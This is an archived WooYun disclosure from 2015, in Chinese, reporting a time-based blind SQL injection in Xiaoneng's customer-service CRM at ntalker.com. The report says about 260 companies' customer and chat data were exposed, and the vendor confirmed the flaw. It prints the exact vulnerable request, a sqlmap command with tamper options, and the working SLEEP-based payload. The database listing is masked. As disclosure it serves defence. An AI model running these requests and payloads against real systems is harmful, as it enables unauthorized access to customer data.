当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0121142

漏洞标题:小能客服CRM系统SQL注入(影响包括海尔、酷派、金立等260家企业,上百万客户信息、上亿条信息泄漏)

相关厂商:xiaoneng.cn

漏洞作者: 高小厨

提交时间:2015-06-18 09:48

修复时间:2015-08-02 18:34

公开时间:2015-08-02 18:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-18: 细节已通知厂商并且等待厂商处理中
2015-06-18: 厂商已经确认,细节仅向厂商公开
2015-06-28: 细节向核心白帽子及相关领域专家公开
2015-07-08: 细节向普通白帽子公开
2015-07-18: 细节向实习白帽子公开
2015-08-02: 细节向公众公开

简要描述:

小能客服CRM系统存在SQL注入,影响包括海尔、酷派、住哪网、华为、金立等260家企业,上百万客户资料、上亿条聊天信息泄漏。
来个雷霹下可好?

详细说明:

你们的客户

0.jpg


ntalker.com域名是你们为客户服务域名。
漏洞地址:

GET /t2d/t2dstatus?query=requestchat&sitid=kf_9823&settingid=kf_9823_1377055050101&uid=kf_9823_ISME9754_guest42FC3E24-D350-E2&uids=kf_9823_ISME9754_GT2D_link_kf_9823_1377055050101_icon&issingle=0&cid=guest42FC3E24-D350-E272-CEC8-904EE680875B&type=0&callbackname=callBack_chat_187437C3&ts=1434249552525 HTTP/1.1
Host: sslim4.ntalker.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2391.0 Safari/537.36
Referer: http://5lux.com/
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8


uid参数存在基于时间的盲注

1.jpg


sqlmap走起

c:\sqlmap>sqlmap -r "C:\Users\Looke\Desktop\2.txt" -p uid --risk 3 --level 5  --dbms mysql --technique T   --tamper "space2mysqlblank"  --count


漏洞证明:

时间注入跑得那叫一个蛋疼,跑了好几天终于把关键部分跑出来了。
数据库:

数据库.jpg


总共上亿条聊天数据信息漏洞

信息数.jpg


11.jpg


上百万条客户信息漏洞

客户信息.jpg


客户信息数据.jpg


数据项目数

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: uid (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: query=requestchat&sitid=kf_9823&settingid=kf_9823_1377055050101&uid=kf_9823_ISME9754_guest42FC3E24-D350-E2' AND (SELECT * FROM (SELECT(SLEEP(5)))rXVG) AND 'rQac'='rQac&uids=kf_9823_ISME9754_GT2D_link_kf_9823_1377055050101_icon&issingle=0&cid=guest42FC3E24-D350-E272-CEC8-904EE680875B&type=0&callbackname=callBack_chat_187437C3&ts=1434249552525
---
back-end DBMS: MySQL >= 5.0.0
Database: tmp
mask 区域
*****------------*****
***** *****
*****------------*****
***** *****
***** *****
*****------------*****
**********
*****ase*****
*****------------*****
***** *****
*****------------*****
***** *****
***** *****
*****_cold *****
***** *****
***** *****
***** *****
***** *****
*****1 *****
*****0 *****
*****8 *****
*****9 *****
*****7 *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****2 *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****rl_cold *****
***** *****
***** *****
***** *****
***** *****
*****e *****
*****l48 *****
***** *****
*****rl *****
***** *****
*****l *****
*****d *****
***** *****
***** *****
***** *****
***** *****
*****e_cold *****
***** *****
***** *****
***** *****
***** *****
*****l48 *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****n48 *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****8 *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****pi48 *****
*****s *****
***** *****
***** *****
***** *****
***** *****
*****l *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****new *****
***** *****
*****p *****
***** *****
***** *****
*****n *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****2 *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****oad *****
***** *****
***** *****
***** *****
*****_tmp *****
***** *****
*****ds *****
***** *****
***** *****
*****ne *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****t *****
***** *****
***** *****
***** *****
*****nfig *****
*****ry *****
***** *****
*****ne_relat *****
***** *****
*****a_relat *****
***** *****
***** *****
*****e_config *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****ig *****
***** *****
***** *****
***** *****
***** *****
*****nkman *****
*****s_config *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****------------*****
**********
*****formanc*****
*****------------*****
***** *****
*****------------*****
***** *****
***** *****
***** *****
*****------------*****
**********
***** imva*****
*****------------*****
***** *****
*****------------*****
***** *****
***** *****
***** *****
*****------------*****
**********
*****e: m*****
*****------------*****
***** *****
*****------------*****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****------------*****
**********
***** oper*****
*****------------*****
***** *****
*****------------*****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****------------*****
**********
*****ormatio*****
*****------------*****
***** *****
*****------------*****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****ET_APPLICABI*****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****ATS *****
*****------------*****


列举几个案例:
酷派:

酷派.jpg


海尔

海尔.jpg


金立

金立.jpg


由于太多我就不一一列举了

修复方案:

过滤

版权声明:转载请注明来源 高小厨@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-06-18 18:33

厂商回复:

确实有该漏洞,我们会尽快修复。

最新状态:

暂无